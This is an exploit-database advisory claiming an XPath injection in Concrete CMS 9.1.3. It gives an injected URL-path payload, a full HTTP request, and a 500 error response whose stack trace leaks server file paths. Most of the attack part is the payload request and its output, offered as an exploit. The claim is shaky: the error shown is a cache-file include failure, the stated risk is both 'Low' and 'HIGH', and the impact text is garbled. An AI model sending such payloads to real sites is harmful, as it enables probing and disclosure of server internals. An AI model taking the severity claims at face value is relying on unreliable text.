Concrete CMS 9.1.3 XPATH Injection

2022.11.29
Credit: nu11secur1ty
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## Title: concretecms-9.1.3 Xpath injection ## Author: nu11secur1ty ## Date: 11.28.2022 ## Vendor: https://www.concretecms.org/ ## Software: https://www.concretecms.org/download ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3 ## Description: The URL path folder `3` appears to be vulnerable to XPath injection attacks. The test payload 50539478' or 4591=4591-- was submitted in the URL path folder `3`, and an XPath error message was returned. The attacker can flood with requests the system by using this vulnerability to untilted he receives the actual paths of the all content of this system which content is stored on some internal or external server. ## STATUS: HIGH Vulnerability [+] Exploits: 00: ```GET GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 0 ``` [+] Response: ```HTTP HTTP/1.1 500 Internal Server Error Date: Mon, 28 Nov 2022 15:32:22 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Powered-By: PHP/7.4.30 Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 592153 <!DOCTYPE html><!-- Whoops\Exception\ErrorException: include(): Failed opening &#039;C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php&#039; for inclusion (include_path=&#039;C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR&#039;) in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php on line 26 Stack trace: 1. Whoops\Exception\ErrorException-&gt;() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26 2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26 3. Stash\Driver\FileSystem\NativeEncoder-&gt;deserialize() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201 4. Stash\Driver\FileSystem-&gt;getData() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631 5. Stash\Item-&gt;getRecord() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321 6. Stash\Item-&gt;executeGet() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252 7. Stash\Item-&gt;get() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346 8. Stash\Item-&gt;isMiss() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67 9. Concrete\Core\Cache\Adapter\LaminasCacheDriver-&gt;internalGetItem() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356 10. Laminas\Cache\Storage\Adapter\AbstractAdapter-&gt;getItem() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601 11. Laminas\I18n\Translator\Translator-&gt;loadMessages() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434 12. Laminas\I18n\Translator\Translator-&gt;getTranslatedMessage() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349 13. Laminas\I18n\Translator\Translator-&gt;translate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69 14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter-&gt;translate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27 15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47 16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267 17. Concrete\Core\Block\View\BlockView-&gt;renderViewContents() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164 18. Concrete\Core\View\AbstractView-&gt;render() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853 19. Concrete\Core\Area\Area-&gt;display() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128 20. Concrete\Core\Area\GlobalArea-&gt;display() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11 21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125 22. Concrete\Core\View\View-&gt;inc() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4 23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329 24. Concrete\Core\View\View-&gt;renderTemplate() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291 25. Concrete\Core\View\View-&gt;renderViewContents() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164 26. Concrete\Core\View\AbstractView-&gt;render() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19 27. Concrete\Controller\SinglePage\PageNotFound-&gt;view() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318 28. call_user_func_array() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318 29. Concrete\Core\Controller\AbstractController-&gt;runAction() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188 30. Concrete\Core\Http\ResponseFactory-&gt;controller() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95 31. Concrete\Core\Http\ResponseFactory-&gt;notFound() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390 32. Concrete\Core\Http\ResponseFactory-&gt;collectionNotFound() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234 33. Concrete\Core\Http\ResponseFactory-&gt;collection() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132 34. Concrete\Core\Http\DefaultDispatcher-&gt;handleDispatch() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60 35. Concrete\Core\Http\DefaultDispatcher-&gt;dispatch() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39 36. Concrete\Core\Http\Middleware\DispatcherDelegate-&gt;next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39 37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware-&gt;process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50 38. Concrete\Core\Http\Middleware\MiddlewareDelegate-&gt;next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36 39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware-&gt;process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50 40. Concrete\Core\Http\Middleware\MiddlewareDelegate-&gt;next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36 41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware-&gt;process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50 42. Concrete\Core\Http\Middleware\MiddlewareDelegate-&gt;next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35 43. Concrete\Core\Http\Middleware\CookieMiddleware-&gt;process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50 44. Concrete\Core\Http\Middleware\MiddlewareDelegate-&gt;next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29 45. Concrete\Core\Http\Middleware\ApplicationMiddleware-&gt;process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50 46. Concrete\Core\Http\Middleware\MiddlewareDelegate-&gt;next() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86 47. Concrete\Core\Http\Middleware\MiddlewareStack-&gt;process() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85 48. Concrete\Core\Http\DefaultServer-&gt;handleRequest() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125 49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner-&gt;run() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102 50. Concrete\Core\Foundation\Runtime\DefaultRuntime-&gt;run() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45 51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2 --><html> <head> <meta charset="utf-8"> <meta name="robots" content="noindex,nofollow"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/> <title>Concrete CMS has encountered an issue.</title> <style>body { font: 12px "Helvetica Neue", helvetica, arial, sans-serif; color: #131313; background: #eeeeee; padding:0; margin: 0; max-height: 100%; text-rendering: optimizeLegibility; } a { text-decoration: none; } .Whoops.container { position: relative; z-index: 9999999999; } .panel { overflow-y: scroll; height: 100%; position: fixed; margin: 0; left: 0; top: 0; } .branding { position: absolute; top: 10px; right: 20px; color: #777777; font-size: 10px; z-index: 100; } .branding a { color: #e95353; } header { color: white; box-sizing: border-box; background-color: #2a2a2a; padding: 35px 40px; max-height: 180px; overflow: hidden; transition: 0.5s; } header.header-expand { max-height: 1000px; } .exc-title { margin: 0; color: #bebebe; font-size: 14px; } .exc-title-primary, .exc-title-secondary { color: #e95353; } .exc-message { font-size: 20px; word-wrap: break-word; margin: 4px 0 0 0; color: white; } .exc-message span { display: block; } .exc-message-empty-notice { color: #a29d9d; font-weight: 300; } ....... ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3) ## Proof and Exploit: [href](https://streamable.com/4f60ka) ## Time spent `03:00:00`


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com

 

Back to Top